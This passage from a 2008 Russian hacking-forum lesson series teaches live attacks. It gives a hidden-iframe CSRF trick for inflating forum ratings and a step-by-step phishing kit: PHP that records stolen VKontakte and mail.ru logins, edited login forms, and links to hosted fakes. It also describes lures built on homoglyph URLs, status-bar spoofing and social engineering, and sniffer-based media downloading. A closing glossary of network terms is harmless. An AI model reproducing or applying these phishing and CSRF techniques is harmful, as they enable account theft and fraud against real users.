После чего создайте еще один html файлик с названием index.html
И напишите в него вот что.....
<html>
<title>
Good picture
</title>
<bоdу background="1.jpg"> //1.jpg это любая картинка.
<ifrаmе src="1.html" width="1" height="1"></ifrаmе> //тут вы подключили файлик....с XSRF Если у вас их больше то продолжите....
<ifrаmе src="2.html" width="1" height="1"></ifrаmе> //Если у вас их больше одного.....
</bоdу>
</html>
Теперь заходим в папку test.....и там есть ссылка "Загрузить файлы"
Загружаете все ваши файлы....(картинка,index.html,1.html,2.html)
После чего можете любому форумчанину подкинуть вашу ссылку....она будет примерно выглядеть так....
http://xakep9009.narod.ru/test/index.html
И ваш рейтинг чуть чуть поднимится }=)
Можете мне поднять рейтинг если хотите))) перейдя вот по этой ссылке http://xakep9009.narod.ru/test/index.html ....
(за одно хоть проверю не блокирует ли более чем 2 записи xakep.ru....) я просто проверял с двумя файлами 1.html и 2.html .....ну тогда прокатило удачно))) мне добавили 4 балла)))
Вывод
1)Мы с вами познакомились с такой мега уязвимостью как XSRF
2)Повторили html
3)Узнали как можно прятать загружаемые странички....через тэг ifrаmе
4)На практике рассмотрели к чему может привести XSRF в действии.
5)Теперь будем баловаться с рейтингом
_____________________________________________________________________________________________________
Ну собственно всё на сегодня))))
Надеюсь ,что вы узнали для себя что то новое.....
и буду очень рад если вы выполните еще одно домашнее задание....
Попробуйте на том же fa-kit.ru написать XSRF для отправки писма.....(от чужого имени)
И еще одно задание потяжелее......
Это найти способ собирать эти ссылки(Оценить сообщение) от опредилённого пользователя....(не в ручную)
и Попробовать написать XSRF для автоматического создания темы на forum.xakep.ru .
А я пойду празновать своё ДР
< Сообщение отредактировано Xakep9009 -- 19.10.2008 5:13:14 >
Так-с....собственно это моя ошибка....если вы что то не поняли.....
Давайте устранять....
______________________________________________
Что касается рейтинга...если кто не верит....то посмотрите на мой рейтинг.....
С 260 он за день поднялся на 438..... и это учтите что я не впаривал народу ссылку.....(кто хотел тот и поднял мне рейтинг)
//Собственно это я написал , чтобы вы не сомневались в её присутствии ...
Теперь давайте разберёмся почему у вас может не сработать.....
1)Это вы не правильно написали ссылку......(или указали правильную ссылку....а ID забыли переименовать....)
Пример ....
<form method="post" action="http://forum.xakep.ru/rating.aspx?action=rate&m=1239766" name="proba">
А тут вы сделали ошибку.....
<input name="m" value="1239766" type="hidden">
Опять же .....напоминаю....эта ссылка для повышения МОЕГО РЕЙТИНГА.....
А если вы хотите повысить себе рейтинг.....то собирите ссылки от ваших постов......
Сделать это можно так.....
Видите ваш пос......внизу него есть приписка...." [link=http://forum.xakep.ru/m_1224792/mpage_11/key_/javasсriрt:void(repwin('/rating.aspx?action=rate&m=1254738',%20false))]Оценить пост[/link]"
Жмёте на неё....и копируете URL.....и далее подставляете как написано выше.....
2) Это вы сохранили мой код с комментариями......такое тоже может быть.....
______________________________________________________________
А вообще ....очень странно , что у вас не получается.....я всё еще раз перепроверил....у меня всё работает.....
(Что касается fa-kit.ru если у кого то не получилось...(выкиноло сообщение "Привет Хакерам!") это означает что вы не сидели под пользователем во время открытия странички......)
_______________________________________________________________
Если бы вы учили html этих проблемм не возникло.....поэтому постарайтесь в свободное время освежить память(html)
А для тех кто что то еще не понял...я выложу файлики...из этого урока.....
Кто захочет тот всё разберёт и всё поймёт....(хотябы по примерам)
http://rapidshare.com/files/155552220/_ … 1.rar.html
А что касается хостинга..... то phpnet.us не плохой...потдержка php и MySQL =)
Можно пропустить.
_______________________________________________________
После починки ноута я посмотрел , что много вопросов задаётся....с чего начать...
не смотря на то , что я очень тщательно стараюсь отвечать на этот вопрос....вижу что всёравно
вопрос остаётся открытым.Так закроем его раз и навсегда.
_______________________________________________________
Урок 12.
С чего начать свой путь.
Я уверен ,что многие из вас станут хакерами по круче меня раза в 3 ...или в 4...
И уверенность моя заключается в том , что у большинства из вас есть то ,что нету у меня...
1)Усидчивость
2)Правильно спланированное время(время)
3)Мозги //=) их у меня не так уж много =)
_________________________________________________________________________________________________________________________
Когда я начинал изучать взлом....и всё что с ним связанно мне было 12-13 лет =)
Я уже тогда чисто интуитивно понял , что без знания языка программирования ничего не получится.....
И первым делом я начал изучать Паскаль.
Это была моя первая тотальная ошибка.
Многие твердят ,что его надо изучать для того чтобы понять синтаксис других языков программирования.....итп.
Могу вам сказать...ничего толкового я из этого языка не взял....единственное что я сделал на этом языке это autorun (авторан)
При запихивании дискетки в компьютер....она включала пищалку....(как при переполнении буфера).
Так что взяли на заметку.....такие языки как Basic , Pascal (Турбо Паскаль) не нужны для взлома......
Не тратьте на них своё время....эти языки мёртвые .....единственная причина по которой вы можете их изучить...это любопытство.
И первой моей ступенькой к познанию взлома стал мега прорыв.....
Познание поисковика Google.com
После чего я начал записывать всё что я находил в интернете про взлом ...в тетрадь....дабы не забыть.....
У меня эта тетрадь до сих пор лежит.....там очень много интересного что я тогда выписывал...и каждый год я датировал....и писал когда вносил последние добавления.....(сейчас она у меня как реликвия лежит) =-)
После поисковика я начал читать журнал Хакер.(на данный момент у меня почти все журналы Хакера...кроме самых первых....но их я прочитал в электронном виде)
Но читая всю эту "муть" я понимал что ничего не понимаю...что за shell что за BIOS что за реверс....что за бэкап....ну итд.
Тогда я понял....а почему бы мне не составить словарь Хакера...(собственный)и завёл себе ещё одну тетрадь куда я записывал не известные слова......и после того как входил в интернет искал их и записывал.....до сих пор помню что первым словом в словаре было IP
Набрав достаточный словарный запас я начал изучать Windows ...
И делал я это опять же в Google набирав запросы на подобии "Скрытые возможности Windows"
После чего я очень сильно продвинулся ибо теперь понимал как можно использовать Crack`и и по какому принцыпу они работают.....
После того как стал продвинутым пользователем Windows (начал понимать работу Windows и исправлять её недочёты) я понял ,что хочется мне чего то по взламывать....
И начал активно капать старые диски Хакера (а именно Видео взом)
На этом этапе я тупо смотрел ....и не понимал что они делают.....попусту тратил время...(и это мой большой минус ибо тогда я не знал....что же они такое делают...и что нужно знать , чтобы самому осознанно такое проделвыать....)
Набравшись опыта могу вам выстроить лестницу по которой вы должны будите пройти ...чтобы стать Хакерами.....и она будет выглядеть так.....
1)Поисковик Google
2)Углублённое знание html
3)На третем пункте мнения могут разайтись....но я скажу что PHP
4)SQL запросы
5)jаvаsсript
6)Perl
7)UNIX
//вообще Юникс по возможности надо изучать параллельно со всеми остальными пунктами...ибо сейчас почти все сервера держатся на нём.
8)Python
9)ASP/ASPX
Это всё то , что необходимо знать любому Хакеру....если даже не всё.....то железно нужно знать первые 5 пунктов...и именно в такой хронологии...
Моей главной ошибкой в начале изучения была .....не компитентность в структуре сайта.....(я не знал как работает сайт....что это такое , а уже просматривал видео по взлому) так вот если вы хотите подойти ко взлому серьёздно...то первым делом вам надо изучить структуру сайта....и понять ,что сайт это простые файлы....которые лежат на другом компьютере....а вы этот файл просматриваете через специальную программу.......
После того как вы поймёте , что такое сайт....как он устроен.....получите хотябы начальные знания по php и jаvаsсript вы сможете смело переходить к следующему этапу.....это непосредственное изучение методов взлома.....
Что собственно я вам продемонстрировал...в моих урока....
То что я написал вам поможет.....но для того ,чтобы применять что то осознанно....и ломать не то что можешь...а то что хочешь....нужно делать всё осознанно.....а для этого нужно знать язык(и) программирования =D
Тут конечно я для вас сразу же становлюсь снобом.....но это так.....на начальном этапе я всех людей говорящих мне ,что без знания языка(ов) ты ничего не сможешь , просто посылал в топку =)))и зря это делал....думаю сейчас бы я добился большего...чем имею.....(знания)
Ну а после того как я уже наконец то изучил SQL и PHP я начал читать разные статьи с
antichat.ru и параллельно смотреть видео по взлому video.antichat.ru //На тот момент это был самй актуальный сайт....на эту тематику....
А сейчас уже много аналогов появилось ( http://www.inattack.ru/group_article/45.html ) ....и по разным мнениям кто то их считает лучше ...кто то хуже.....
Лично я учился вот как
antichat + google + Журнал Хакер + Книги купленные по тематике.....
Кстати относительно старую мою библиотеку вы можете посмотреть по фотке =) http://rs.foto.radikal.ru/0709/79/936013da7298.jpg
Не помню когда это было....нашёл в поисковике.....
Из книг которые мне помогли могу отметить .....
1)WEB-сервер глазами Хакера
2)Исскуство Эксплойта Джон Эриксон
Всё остальное что я читал было либо фуфло...либо не относилось ко взлому.....
Могу привести пример первосортного фуфла....эта книга "Хакинг и Антихакинг" такой фиговой книги даже в свои 15 лет я нигде тогда не видел Х-) кому интересно можете посмотретьhttp://www.knigka.info/2007/04/21/bystro_i_legko_khaking_i_antikhaking_zashhita_i_napadenie.html
Ну и естественно вам надо знать ссылки...на самые свежие найденые уязвимости
wwwsecuritylab.ru
http://www.cyberinfo.ru/2/index.htm
Ну и такой наиизвеснейший ресурс среди хакеров это
http://milw0rm.com/
Там есть самые свежие Эксплойты....крякер MD5 (онлайн)....и еще куча куча всего....вообщем сами зайдёте посмотрите.....
НО есть одно НО...если вы не знаете английского.....не сладко вам прийдётся....поэтому прибавляйте ко всем пунктам которые я написал десятый.... 10)Знание Английского
Эксплой - http://ru.wikipedia.org/wiki/Эксплойт
Да и вообще большинство документации от разных хакерских программ и Эксплойтов идут на английском языке...
Вывод
1)Мы сняли вопрос "С чего начать?" раз и навсегда....
2)Я поделился своим опытом...и надеюсь вы не повторите мои ошибки в дальнейшем....(изучение ненужных языков,параллельное изучение одинаковых по синтаксису языков итд.)
3)Вы теперь имеете полное представление о том как надо продивигатсья ....
4)Узнали что такое Эксплойт =) и где его искать.....
//от себя хочу добавить Эксплойт это что то на подобии руководства к действию(для взлома)...ибо авторы написанного эксплойта делают комментарии и изучив их вы сможете легко ориентироваться в написанном коде.....
_______________________________________________________________________________________________
Я считаю что этот урок должен снять почти все вопросы в плане изучения.....
И надеюсь вам он хочь чуть чуть....но поможет.....не смотря на то ,что тут мало конкретной информации про взлом.
Можно пропустить.
_______________________________________________________
Я таки вернулся....извиняюсь ,что так долго небыло.....даже
сейчас пишу в замен своей оценке по МЭО =)))у нас сегодня будет
зачёт по этому предмету =)))Ну надеюсь вы этот урок оцените...ибо он будет
посвящён...
_______________________________________________________
Урок 13.
Создаём собственный фейк!
Фейк произошло от Английского слова fake — подделка.
В нашем случае мы будем подделывать странички авторизации , для того чтобы заполучить заветный логин:пароль от любого сайта.
Я встречал много тем....там где продают фейки....а люди даже их покупают..... запомните всё самое лучшее можете сделать вы сами....и делаете это вы бесплатно!ну и перед тем как начать....хочу сказать ,что создание фейков это очень лёгкое дело....
Моё главное требование к этому уроку это знание html.
Не смотря на то ,что я буду использовать php(файлик)...знание его вам в этом уроке вообще не понадобится!
Создаём фейк Vkontakte
1)Первым делом зайдём на страничку Vkontakte.ru
//И если вы зашли под своей учётной записью выйдите из неё.
Перед вами должна открыться страничка "Добро пожаловать" её мы и будем потделывать.
2)Создаём папку на рабочем столе под названием sait
После чего сохраняем страничку vkontakte.ru (добро пожаловать)вот таким способом....в
-Firefox (Файл---Сохранить как...---(далее переходим в ту папку куда сохранять "sait")---(Выбираем тип страницы "Веб-страница полностью" ,a имя файла даёте index.html)
-Opera(Файл---Сохранить как---(переходим в папку sait)---(Выбираем тип файла "HTML файл с изображениями" имя файла index.html)
-Internet Explorer(Файл---Сохранить как---(Выбираем тип фалйа "Веб-страница полностью" имя файла index.html)
_________________________________________________________________________________________________________
Но не делайте пожалуйста очень популярной ошибки.....такой как index.html.html , index.html.mnt //двойное расширение.
Для того чтобы её избежать этой ошибки поставьте у себя в настройках:
Панель управления---Свойство папки---(вкладка) вид---(и снять галку с поля)"Скрывать расширения для зарегистрированных типов файлов"--ОК
И теперь у ваших файлов всегда будет отображаться расширение!
__________________________________________________________________________________________________________
И так мы сохранили страничку полностью!
Теперь если мы откроем наш index.html мы увидим ,что у нас полностью идентичная страничка!(Для этого мы и сохраняли не только html но и сами картинки).
3)Теперь нам надо подредактировать код этой странички так, чтобы когда пользователь ввёл логин и пароль....на нашей страничке все пароли сохранились у нас на сервере.....
для этого нам понадобится один php файлик с таким содержанием.
_________________________________________________________________________
<?
$Login = $_POST['login']; // Логин...
$Pass = $_POST['passwd']; // Пароль...
$log = fopen("base.php","a+"); //открываем файл хранилища...
fwrite($log,"<br> $Login:$Pass \n"); //записываем всё в хранишище...
fclose($log); //закрываем хранилище
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru'></head></html>"; // перенаправляем пользвателя на любую //ссылку в данном случае http://vkontakte.ru
?>
_________________________________________________________________________
Сохраняем этот файлик под названием log.php
И создаём файлик base.php //с пустым содержанием.
Да, и всё это мы сохраняем в папку sait там где у нас лежит наш будущий фейк.
4)Теперь перейдём непосредственно к редактированию index.html
Открываем его в любом редакторе (блокноте или NotePad++) //Очень рекомендую всем кто занимается кодингом использовать NotePad++ удобно.
И всё ,что нам нужно для создания собственного фейка это
4.1)Найти Форму для регистрации<form ....
4.2)Присвоить ей значение action="log.php" тоесть получится <form action="log.php" ....>
4.3)И в поле name присвоить login или passwd(name="login" ,name="passwd")
Не пугайтесь сейчас всё поясню на примере....
А пока знайте ....что значения в поле name (login , passwd) присваиваются именно такие ,потому как я им присвоил значение в моём мини php скрипте....(я их выделили жирным цветом)
А при помощи action="log.php" мы форме говорим "ДЕЛАЙ ТО ,ЧТО НАПИСАНО В ЭТОМ СКРИПТЕ!".
И так поехали....
1)Ищем форму которая занимается авторизацией!
Делаем мы это так....
Открываем наш index.html при помощи блокнота....
жмём: Правка---Найти---(ищем вот что...) <form
И первое ,что нам выдаётся это вот эта строчка...
<form method="post" name="login" id="login" action="login.php">
Это то что нам нужно! мы по интуиции догадались....что наверное action="login.php" выполняет скрипт для входа в систему....=) тут и ёж поймёт...
Теперь нам надо ,чтобы вместо ихнего скрипта выполнялся наш....значит пишем так....
<form method="post" name="login" id="login" action="log.php">
Далее нам уже надо искать <input в который идёт информация о Логине....Вконтакте это поле называют Email.
Пробуем искать.....и находим вот такую строчку....
<input class="inputText" onclick="show('expirePad');" name="email" id="email" size="20" type="text">
Меняем ,как я уже говорил на наше значение.....name="login" и у нас плучается
<input class="inputText" onclick="show('expirePad');" name="login" id="email" size="20" type="text">
Точно так же ....глазками ищем что то похожое на password или pass и мы находим
<input class="inputText" onclick="show('expirePad');" name="pass" id="pass" size="20" type="password">
Заменяем на наше значение....
<input class="inputText" onclick="show('expirePad');" name="passwd" id="pass" size="20" type="password">
Вот и всё....наш фейк готов! =)))
А вы думали ,что это тяжело....или вообще не думали
Теперь нам надо его опробовать....
Я вам говорил ,что для наших нужд понадобится....сервер.....можете проверить всё на вашем компьютере(локальном серевере)//PHP+Apach+MySQL см прошлые уроки.
Либо сделать как я =)))выложить своё творение на бесплатный хостинг t35.com =)))
Я зарегал себе там бесплатный акаутн.....так как там есть всё ,что нам нужно php+FTP
Если хотите посмотреть на мой фейк...то он расположен тут http://vkontaktee.t35.com
При выборе моего пути надеюсь трудностей не возникло....(регистрация)
После того как вы зарегистрировались.....вы можете выкладывать свой сайт....
Делается это чень просто.....открываем "Мой компьютер" и в том месте где написанно "Мой компьютер" (адресная строка) прописываем ftpt35.com
Далее в появившимся окошке вводим
Логин и Пароль....вашей учётной записи....вот такого вида...
vkontaktee.t35.com : qwertypass
После чего у вы подключитесь к серверу.....и это у вас будет выглядеть...как будто вы находитесь в папке ...в которой ничего нету....
Так вот это называется корневая директория .....переносим туда все наши файлы....
1)index.html
2)полностью папку(с изображениями которая была создана вместе с index.html иначе у нас не будет никаких картинок и логотипов.)
3)base.php
4)log.php
Теперь ваш фейк полностью готов к применению.
Проверяем его работоспособность.....
Заходим на свою страничку.....допустим vkontaktee.t35.com
И проходим авторизацию......(как мы это делаем обычно)
после чего......переходим по ссылке vkontaktee.t35.com/base.php
И видим ,что у нас записался логин и пароль......в файлик base.php
Всё.
Давайте для закрепления матерьяла рассмотрим еще один пример с mail.ru
Создаём собственный фейк для mail.ru
Поехали по схеме....
1)сохраняем нашу страничку со всеми картинками и всяким бредом.....и называем её index.html
2)Открываем и начинаем редактировать....
ищем форму для авторизации <form (там где action= хоть как то похож на автризацию......)
вот что мы нашли....
<form name="Auth" method="post" action="http://win.mail.ru/cgi-bin/auth"> //очень похожо на авторизацию не правда ли ?
Заменяем на
<form name="Auth" method="post" action="log.php">
продолжаем идти по схеме...и ищем <input связанный хоть как то с login и password
и мы находим эти поля
<input type="text" class="long" size="10" name="Login" tabindex="1" value="" />
<input type="password" class="long" size="15" name="Password" tabindex="3" value="" />
Меняем их на наши значения....login и passwd // хочу сразу заметить ,что регистр очень важен....Login и login разные вещи!
<input type="text" class="long" size="10" name="login" tabindex="1" value="" />
<input type="password" class="long" size="15" name="passwd" tabindex="3" value="" />
вот и всё....фейк готов....
Те кто знают html могут сделать этот фейк из любительского....в профессиональный....(тоесть при переходе по ссылкам в этих страничках....ты всёравно выходишь на фэйковский ресурс....)
Тот же Вконтакте ....мне было просто лень делать тоже самое но только в том случае если жертва нажмёт не на вход ,а на ,допустим Регистрацию или допустим на смену языка........короче это всё делается по токому же принцыпу.....и надеюсь хоть чуть чуть он вам стал понятен....
"Надо учить формы }=) "
----------------------------------------------------------------------------------
Но....вы наверное возмутитесь.....если я вам скажу ,что все сворованные пароли может посмотреть любой проходимец....да это факт....как с этим бороться.....учить php... и моё к вам задание сделайте так...,чтобы файлик base.php не мог просматриваться посторонними лицами...НО! при этом ,чтобы он оставался работоспособным!
это я вам на всякий случай сказал...чтобы небыло тут баталий....а я могу твои данный стянуть, учитесь защите.
----------------------------------------------------------------------------------
если кому то всё еще не понятно как делаются фейки.....я для вас выложил свои 4 фейка....в качестве примера......
vkontakte.ru
forum.xakep.ru
Gmail.com
mail.ru
сюда http://vkontaktee.t35.com/fakes_By_Xakep9009.rar
Несколько способов впарить фейк
Ну и теперь парочку примеров из практики....
1)
чаще всего я свои фейки прячу в ссылки на форумах....или в почте......в ICQ к сожалению такой фишки как --
Тоесть я прячу нашу ссылку вот так..... пишу httр://vkоntаktе.ru только малая хитрость заключается в том ,что
в место p - английской...я написал букву р -русскую .....в место о - английской о -русскую.....ну вы поняли логику.....таким образом у нас из [link=http://vk%D0%BEntakte.ru]http://vkоntakte.ru[/link] получился обычный текст ....а не ссылка....а во всех форумах и почтовых серверах(или почти во всех) есть функция вставлять ссылку в слова.....
типо скачивать >>>>>сюда<<<<<
Это был первый способ....
Второй мне больше по душе =)))на него ловятся 99,9% людей.....
Хакеры это хорошие психологи....и любой хакер должен знать не только слабость ресурса(сайта) но и его хозяйна.....
И поэтому заявления ,что СИ (соц инженерия) это не по хакрески это полная глупость
почитайте кстати про [link=http://ru.wikipedia.org/wiki/%D0%A1%D0%BE%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%B0%D1%8F_%D0%B8%D0%BD%D0%B6%D0%B5%D0%BD%D0%B5%D1%80%D0%B8%D1%8F]Социальную Инженерию[/link]
Меня уже несколько раз просили написать про СИ....вот один из моих любимых примеров внедрения фейка при помощи СИ....
Я говорю / пишу жертве , что нашёл обалочку...через которую можно подключиться к сайту вконтакте.....и качать от тудо музыку , кино, просматривать скрытую информацию. (этот способ использую тогда , когда скрыть ссылку почти невозможно) но он эффективен как я уже говорил на 99,9% =D ибо алчность людей до безумства сводит......
Кстати хакеров тоже....так что не будьте алчными....
Еще один способ это подмена URL (адресной строки) в строке состояния.....тобишь то,что вы видите наведя курсором на ссылку.
Но его можно использовать только если жертва сидит под IE (что бывает в большинстве случев)
и так пишем html код
<a href="http://vkontaktee.t35.com/"
onMouseOver="window.status = 'http://vkontakte.ru';
return true;"
onMouseOut="window.status='';">http://vkontakte.com</a>
Теперь при наведении на ссылку у нас в левом нижнем углу будет высвечиваться vkontakte.ru а не мой фейк_)
Каждый из вас может придумать свой способ....и пользоваться им!=) и он будет успешным))Так что не расчитывайте на других...учитесь думать сами.....я вот учусь =-) хоть и безуспешно 
Вывод
1)Мы сегодня познакомились с вами еще с одним видом атаки на WEB сайты.
2)Повторили что такое ftp .
3)Рассмотрели несколько способов "впаривания фейков".
4)Поняли ,что фейк может создать любой....лижбы было желание.
5)Поставили точку в обсуждении о нужности СИ (соц. инженерии). НУЖНА.
6)Повторили html =)
7)Ну и самое главное научились делать фейк!и нам теперь ненадо постить "люди создайте фейк от forum.sex.ru" =)
______________________________________________________________________________
Надеюсь этот урок вам понравится =-)
И вы узнаете \ узнали что то новое!
Удачи!
< Сообщение отредактировано Xakep9009 -- 17.11.2008 4:36:08 >
Урок 14.
Фишки от Xakep9009
HTTP это HyperText Transfer Protocol — протокол передачи гипертекста.
Более подробно смотрите тут http://ru.wikipedia.org/wiki/HTTP
Sniffer - от английского слова нюхать. - Сетевой анализ трафика (не пугайтесь , звучит угрожающе...на самом деле ерунда , на примере всё поймёте.)
Более подробно смотрите тут http://ru.wikipedia.org/wiki/Sniffer
Для того чтобы просматривать весь проходящий трафик...нам нужно будет скачать такую программу как EffeTechHTTPSniffer
Она понадобится для того ,чтобы на более низком уровне просматривать весть проходящий трафик по HTTP протоколу....
Эту программу вы можете найти тут.
http://narod.ru/disk/3930462000/EffeTec … r.rar.html
После того как вы её установили....мы перейдём к фишкам....которых я 4 недели назад искал и ничего об этом не нашёл....
Обманываем обманщиков.
Под обманщиками я понимаю такие сайты как vkontakte.ru и weborama.ru
Почему они обманщики?....а потому что выкладывать музыку можно....а скачать нельзя....что за бред?
Ну так давайте обманим тех кто обманывает нас....и научимся скачивать музыку с любого сайта....(где она есть естественно =) )
Качаем музыку с Vkontakte.ru
//Хочу сразу сказать...что все эти манипуляции я проделывал в Firefox ....с установленным Flash плеером...поэтому если у тебя не установлен //флеш плеер...установи...
ВАЖНО не жмите проигрывание песни до Сниффера
1)Находим нужную нам песню....(в контакте)
2)Не нажимая на проигрывание песни переходим к нашему Снифферу...
3)Жмём Start и наш сниффер начинает работу.
4)Нажимаем на проигрывание песни....ждём пока вы не увидите ,что сниффер перестал ловить пакеты от контакта.
5)Выключаем сниффер (Stop Sniffer)
6)И теперь нам надо из полученных пакетов определить где же наша песня...
А сделать это легко....я просил вас в самом начале не жать проигрывание этой песни...до запуска сниффера...ибо нам важен момент подключения к этой песне....(перехват момента подключения) и этот момент и будет содержать в себе прямую ссылку на этот файл!
Тоесть если вы всё правильно сделали....то у вас в логе сниффера должна была появится примерно такая строчка....
http://cs1334.vkontakte.ru/u5970851/aud … 89b197.mp3
Это и будет прямая ссылка на файл)))
Тоесть в вашем сниффере должна появиться строка с такими значениями
Server(IP:Port) = http://cs1334.vkontakte.ru
URL = /u5970851/audio/f222da89b197.mp3
Это и есть прямая ссылка....на файл....только в разбитом виде....(чтобы получить её полностью вы можете нажать в сниффере на это поле два раза потом перейти во вкладку Content и вот она ваша ссылка полностью)!
7)После того как вы получили ссыку такого вида....
[link=http://cs1334.vkontakte.ru/u5970851/audio/f222da89b197.mp3%C2%A0]http://cs1334.vkontakte.ru/u5970851/audio/f222da89b197.mp3 [/link] переходим по ней....далее
Файл --- Сохранить как --- Тип (все файлы) \ имя (на своё усмотрение).mp3---сохранить.
___________________________________________________________________________
для закрепления...
Качаем видео с Vkontakte.ru
Надеюсь вы поняли ,что на одной музыке мы не остановимся!!!и никаких сервисов для скачивания видео с контакта нам не нужно мы Хакеры мы свободные люди!(пока )
Так вот...поехали...
1)Открываем страничку с видео....(НО НЕ ПРОСМАТРИВАЕМ)
2)Включаем Наш сниффер!
3)Ждём пакетов от контакта....
4)Получаем пакет с подключением....вот такого типа...
http://195.218.181.192/assets/videos/8c … 271.vk.flv
и он же является прямой ссылкой на скачку этого файла....
5)Качаем.//Надеюсь объяснять про flv файлы ненадо....=)
________________________________________________________________
Теперь что же делать если вы всётаки нажали на просмотр\прослушку раньше чем вы включили наш сниффер!
Вам надо удалить все личные данные....(которые браузер сохраняет автоматически.)Делается это в Свойствах или Настройках//в разных браузерах по разному
Теперь проделаем тоже самое с weborama.ru
1)Выбираем песню которую хотим прслушать(но не прослушиваем)
2)Запускаем Сниффер
3)Ждём буквально секунд 10
4)и на Вебораме сделали....поумнее....они спрятали .mp3 в ссылку такого вида
http://static1.weborama.ru/audio/f2/f2b … 2edc7693e5
Как увидили....
Server: http://static1.weborama.ru URL: /audio/f2/f2b5e251369c5ee01931522edc7693e5
Без сомнений копируйте ссылку....и вставляйте в браузер....
После чего подождите пока он обработает запрос....и выдаст вам файл....который вы сможете сохранить как mp3
----------------------------------------------
Это я вам привёл всего несколько возможностей HTTP Sniff`ера....
А те кто удосужились выучить html могут гораздо больше!)
Так же HTTP сниффер используют для нахождения уязвимостей таких как SQL уязвимостей так....и всех о которых я уже писал....так как в адресной строке передаются параметры...которые обычно спрятанны...а при детальном анализе мы сможем применить эту информацию для взлома....
Так же Сниффер можно использовать против пинча....(запустить сниффер , а затем пинч тем самым перехватить Логин и пароль от почты, от сайта.....короче куда отчёты он шлёт)
Так что возьмите себе на заметку такую мощную вещь!
Вывод
1)Узнали что такое HTTP sniffer
2)Мы узнали ,что мы не все процессы видим...которые выполняет наш браузер!
3)Поняли ,что он нам очень поможет в нахождении и реализации уязвимостей.
4)Научились обманывать обманщиков....
______________________________________________________
Надеюсь этот урок вам чем то поможет...и вы из него узнали что то новое.
Моё пожелание заключается в том..., чтобы вы повозились с HTTP Sniffer`oм побольше...
Практика - залог успеха!
Удачи.
< Сообщение отредактировано Xakep9009 -- 23.11.2008 2:41:31 >
1.IP-адрес (aй-пи адрес, сокращение от англ. Internet Protocol Address) — уникальный идентификатор (адрес) устройства (обычно компьютера), подключённого к локальной сети и (или) интернету. IP-адрес представляет собой 32-битовое (по версии IPv4) или 128-битовое (по версии IPv6) двоичное число. Удобной формой записи IP-адреса (IPv4) является запись в виде четырёх десятичных чисел (от 0 до 255), разделённых точками, например, 192.168.0.1. (или 128.10.2.30 — традиционная десятичная форма представления адреса, а 10000000 00001010 00000010 00011110 — двоичная форма представления этого же адреса). IP-адреса представляют собой основной тип адресов, на основании которых сетевой уровень протокола IP передаёт пакеты между сетями. IP-адрес назначается администратором во время конфигурирования компьютеров и маршрутизаторов. IP-адрес состоит из двух частей: номера сети и номера узла. В случае изолированной сети её адрес может быть выбран администратором из специально зарезервированных для таких сетей блоков адресов (192.168.0.0/16, 172.16.0.0/12 или 10.0.0.0/8). Если же сеть должна работать как составная часть Интернета, то адрес сети выдаётся провайдером либо pегиональным интернет-регистратором (Regional Internet Registry, RIR). Согласно [1] существует пять RIR: ARIN, обслуживающий Северную Америку; APNIC, обслуживающий страны Юго-Восточной Азии; AfriNIC, обслуживающий страны Африки; LACNIC, обслуживающий страны Южной Америки и бассейна Карибского моря; и RIPE NCC, обслуживающий Европу, Центральную Азию, Ближний Восток. Региональные регистраторы получают номера автономных систем и большие блоки адресов у IANA, а затем выдают номера автономных систем и блоки адресов меньшего размера локальным интернет-регистраторам (Local Internet Registries, LIR), обычно являющимся крупными провайдерами.
2. MAC-адрес (от англ. Media Access Control — управление доступом к носителю) — это уникальный идентификатор, сопоставляемый с различными типами оборудования для компьютерных сетей. Большинство сетевых протоколов канального уровня используют одно из трёх пространств MAC-адресов, управляемых IEEE: MAC-48, EUI-48 и EUI-64. Адреса в каждом из пространств теоретически должны быть глобально уникальными. Не все протоколы используют MAC-адреса, и не все протоколы, использующие MAC-адреса, нуждаются в подобной уникальности этих адресов.
3. Стек протоколов TCP/IP (англ. Transmission Control Protocol/Internet Protocol) — собирательное название для сетевых протоколов разных уровней, используемых в сетях. В модели OSI данный стек занимает (реализует) все уровни и делится сам на 4 уровня: прикладной, транспортный, межсетевой, уровень доступа к сети (в OSI это уровни - физический, канальный и частично сетевой). На стеке протоколов TCP/IP построено всё взаимодействие пользователей в сети, от программной оболочки до канального уровня модели OSI. По сути это база, на которой завязано всё взаимодействие. При этом стек является независимым от физической среды передачи данных.
4. FTP (англ. File Transfer Protocol — протокол передачи файлов) — протокол, предназначенный для передачи файлов в компьютерных сетях. FTP позволяет подключаться к серверам FTP, просматривать содержимое каталогов и загружать файлы с сервера или на сервер; кроме того, возможен режим передачи файлов между серверами (см. FXP). FTP является одним из старейших прикладных протоколов, появившимся задолго до HTTP, в 1971 году. До начала 90-х годов на долю FTP приходилось около половины трафика в сети Интернет[источник?]. Он и сегодня широко используется для распространения ПО и доступа к удалённым хостам. Протокол FTP относится к протоколам прикладного уровня и для передачи данных использует транспортный протокол TCP. Команды и данные, в отличие от большинства других протоколов передаются по разным портам. Порт 20 используется для передачи данных, порт 21 для передачи команд. Протокол не шифруется, при аутентификации передаёт логин и пароль открытым текстом. Если злоумышленник находится в одном сегменте сети с пользователем FTP, то, используя сниффер, он может перехватить логин и пароль пользователя, или, при наличии специального ПО, получать передаваемые по FTP файлы без авторизации. Чтобы предотвратить перехват трафика, необходимо использовать протокол шифрования данных SSL, который поддерживается многими современными FTP-серверами и некоторыми FTP-клиентами.
5. TELNET (англ. TELecommunication NETwork) — сетевой протокол для реализации текстового интерфейса по сети (в современной форме — при помощи транспорта TCP). Название «telnet» имеют также некоторые утилиты, реализующие клиентскую часть протокола. Хотя в сессии Telnet выделяют клиентскую и серверную сторону, протокол на самом деле полностью симметричен. После установления транспортного соединения (как правило, TCP) оба его конца играют роль «сетевых виртуальных терминалов» (англ. Network Virtual Terminal, NVT), обменивающихся двумя типами данных: Прикладными данными (т.е. данными, которые идут от пользователя к текстовому приложению на стороне сервера и обратно) Опциями протокола Telnet, служащими для уяснения возможностей и предпочтений сторон. Прикладные данные проходят через протокол без изменений[1], т.е. на выходе второго виртуального терминала мы видим именно то, что было введено на вход первого. С точки зрения протокола данные представляют просто последовательность байтов (октетов), по умолчанию принадлежащих набору ASCII, но при включенной опции Binary — любых. Хотя были предложены расширения для идентификации набора символов [2], но на практике ими не пользуются. Все значения октетов прикладных данных кроме \377 (десятичное 255) передаются по транспорту как есть. Октет \377 передаётся последовательностью \377\377 из двух октетов. Это связано с тем, что октет \377 используется на транспортном уровне для кодирования опций.
